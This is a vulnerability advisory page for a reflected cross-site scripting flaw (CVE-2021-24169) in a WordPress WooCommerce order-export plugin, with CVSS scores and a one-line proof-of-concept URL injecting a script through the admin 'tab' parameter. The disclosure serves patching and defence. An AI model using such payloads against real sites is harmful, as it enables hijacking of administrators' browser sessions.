WordPress Advanced Order Export For WooCommerce 3.1.7 Cross Site Scripting

2021.09.23

Credit: 0xB9

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2021-24169

CWE: CWE-79

CVSS Base Score: 4.3/10

Impact Subscore: 2.9/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: None

Integrity impact: Partial

Availability impact: None

# Exploit Title: WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS)
# Date: 15/2/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/woo-order-export-lite/
# Version: 3.1.7
# Tested on: Windows 10
# CVE: CVE-2021-24169

1. Description:
This plugin helps you to easily export WooCommerce order data. The tab parameter in the Admin Panel is vulnerable to XSS.

2. Proof of Concept:
wp-admin/admin.php?page=wc-order-export&tab=</script><script>alert(1)</script>

See this note in RAW Version

Vote for this issue:

100%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

WordPress Advanced Order Export For WooCommerce 3.1.7 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

WordPress Advanced Order Export For WooCommerce 3.1.7 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.